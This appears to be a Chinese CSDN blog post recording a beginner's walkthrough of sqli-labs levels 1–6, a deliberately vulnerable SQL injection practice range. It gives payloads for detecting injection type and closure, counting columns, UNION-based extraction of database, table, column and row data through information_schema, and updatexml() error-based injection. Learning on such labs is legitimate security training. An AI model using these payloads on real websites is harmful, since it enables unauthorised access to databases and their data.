萌新sqli-lab通关记录less-1~less-6

最新推荐文章于 2024-07-23 17:52:34 发布
最新推荐文章于 2024-07-23 17:52:34 发布
阅读量40 收藏
点赞数
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52630049/article/details/130654642
版权

目录

有回显,判断注入类型

less1-less4,重点
其一:在于判断是否为数字型注入
其二:在于判断为字符型注入后,以哪种方式闭合
至于爆其他信息的方式都和less-1一样

less-1

根据提示查看回显
在这里插入图片描述
判断注入类型
id=1 and 1=1
id=1 and 1=2
非数字型注入
判断是否为字符型注入
id=1' and 1=1-- -
id=1' and 1=2-- -
为字符型注入

二分法判断字段数
id=1' order by 3-- -
id=1' order by 4-- -
字段数为3

union联合查询
id=1' and 1=2 union select 1,2,3-- -
爆库,用户
id=1' and 1=2 union select 1,database(),user()-- -
爆表
id=1' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema='security'-- -
爆列
id=1'and 1=2 union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='emails' -- -
爆值
id=1'and 1=2 union select 1,2,id from emails-- -

less-2

根据提示显示回显,判断类型
id=1 and 1=1
id=1 and 1=2
为数字型注入
后面操作与less-1相同

less-3

id=1') and 1=1-- -
id=1') and 1=2-- -
为字符型注入,闭合方式为: ')
其余步骤不变

less-4

id=1") and 1=1-- -
id=1") and 1=2-- -
为字符型注入,闭合方式为: ")
其余步骤不变

无回显,报错注入

判断闭合方式为 ’ 闭合,但联合查询无效,因为无回显
这时可使用盲注或报错注入
(less-6和less-7的区别在于闭合方式不同)
我使用了报错注入

less-5

updatexml()报错注入

爆库
id=1' and updatexml(1,concat('!',database(),'!'),1)-- -
爆表
id=1' and updatexml(1,concat('!',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'!'),1)-- -

爆列
id=1' and updatexml(1,concat('!',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'!'),1)-- -
爆值
id=1' and updatexml(1,concat('!',(select id from emails limit 0,1),'!'),1)-- -

less-6

id=1" and 1=1-- -
id=1" and 1=2-- -
判断为字符型注入," 闭合
其余步骤同less-5

Reji_热寂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2806
sqli-labs靶场之前建议补一下基础。
sqli-lab教程——1-35通关
缘木之鱼
05-08 5737
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges)Less-1 GET - Error...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 8917
sql注入集合
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
OAuth2.0 or Spring Session or 单点登录流程
qq_53374893的博客
07-20 340
一句话精辟解释: 在过滤器放行的时候,偷偷的把原生的 request 和 response 对象换成了它的实现,也就是 调用getSession 的时候拿到的 其实是对redis 操作的Session。但其他的操作还是使用原生的,只不过重写的方法,调用的是子类的,也就是往 redis 里放入 Session,把原生的操作给替换了!分布式Session原理,使用子域名,的时候放入父域名的 JsessionId 然后将这个ID 的所存的内容放入Redis ,这样实现不同域名共享同一sessionID.
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 529
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
秒杀业务: 简单梳理
m0_59925573的博客
07-23 829
(1)在一人一单优惠券秒杀中,先是解决了因线程安全导致的超卖问题,为了满足一人一单的业务需求需要给查询订单表查询库存表上锁,但是synchronized只能满足单机环境下线程安全,在分布式环境对多个JVM需要使用分布式锁,于是手写分布式锁,但是在极端情况下,例如业务超时,会出现“误删”问题,手写锁无法解决,于是引入redisson,借助看门狗机制可以有效解决这个问题。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 719
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
docker容器
2401_83945639的博客
07-20 882
root@lvs-server ~]# docker start 8a1e7f458daf --手动start启动。-v 目录映射【宿主机的目录映射给容器的某个目录,将容器中的目录挂载到宿主机的目录中】docker rm -f $(docker ps -aq) 删除所有的容器。docker rm -f cname 强制删除,可以删除正在运行的容器。-p 端口映射【宿主机的端口映射给容器的某个端口】创建容器并运行 --这个是mysql的容器。docker ps -q 查看所有容器id。
怎样在 PostgreSQL 中实现数据的异地备份?
技术笔记
07-19 1176
总而言之,在 PostgreSQL 中实现数据的异地备份不是一件难事,但也需要我们认真对待,精心规划。选择合适的备份方法和异地存储方式,制定合理的备份策略,定期进行测试和恢复演练,才能确保我们的数据在任何情况下都能“安然无恙”。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
sqlalchemy使用json_unquote函数的mysql like查询
最新发布
ithongchou的博客
07-23 459
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
如何避免推荐系统中的雪崩效应?
xixixixixixixi21的博客
07-19 322
为了避免推荐系统中的“雪崩效应”,也称为热点商品(或冷启动)问题,可以采取以下几种策略:多样性推荐:除了基于流行度的推荐外,还结合用户的兴趣偏好、颖度或其他个性化因素,生成多样化的推荐列表,避免所有用户都集中关注少数几个热门商品。缓存策略:对热门商品推荐结果做持久化存储,当有大量用户同时访问时,可以直接从缓存获取,减轻后端压力。预测模型:使用机器学习算法(如时间序列分析或协同过滤)预测商品未来的热度,提前分配资源,防止临时的突然爆发。
export import 预估耗时 Oracle 所有操作都类似
jnrjian的博客
07-19 560
sofar!...
sqli-labs通关1-5
09-03
- *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值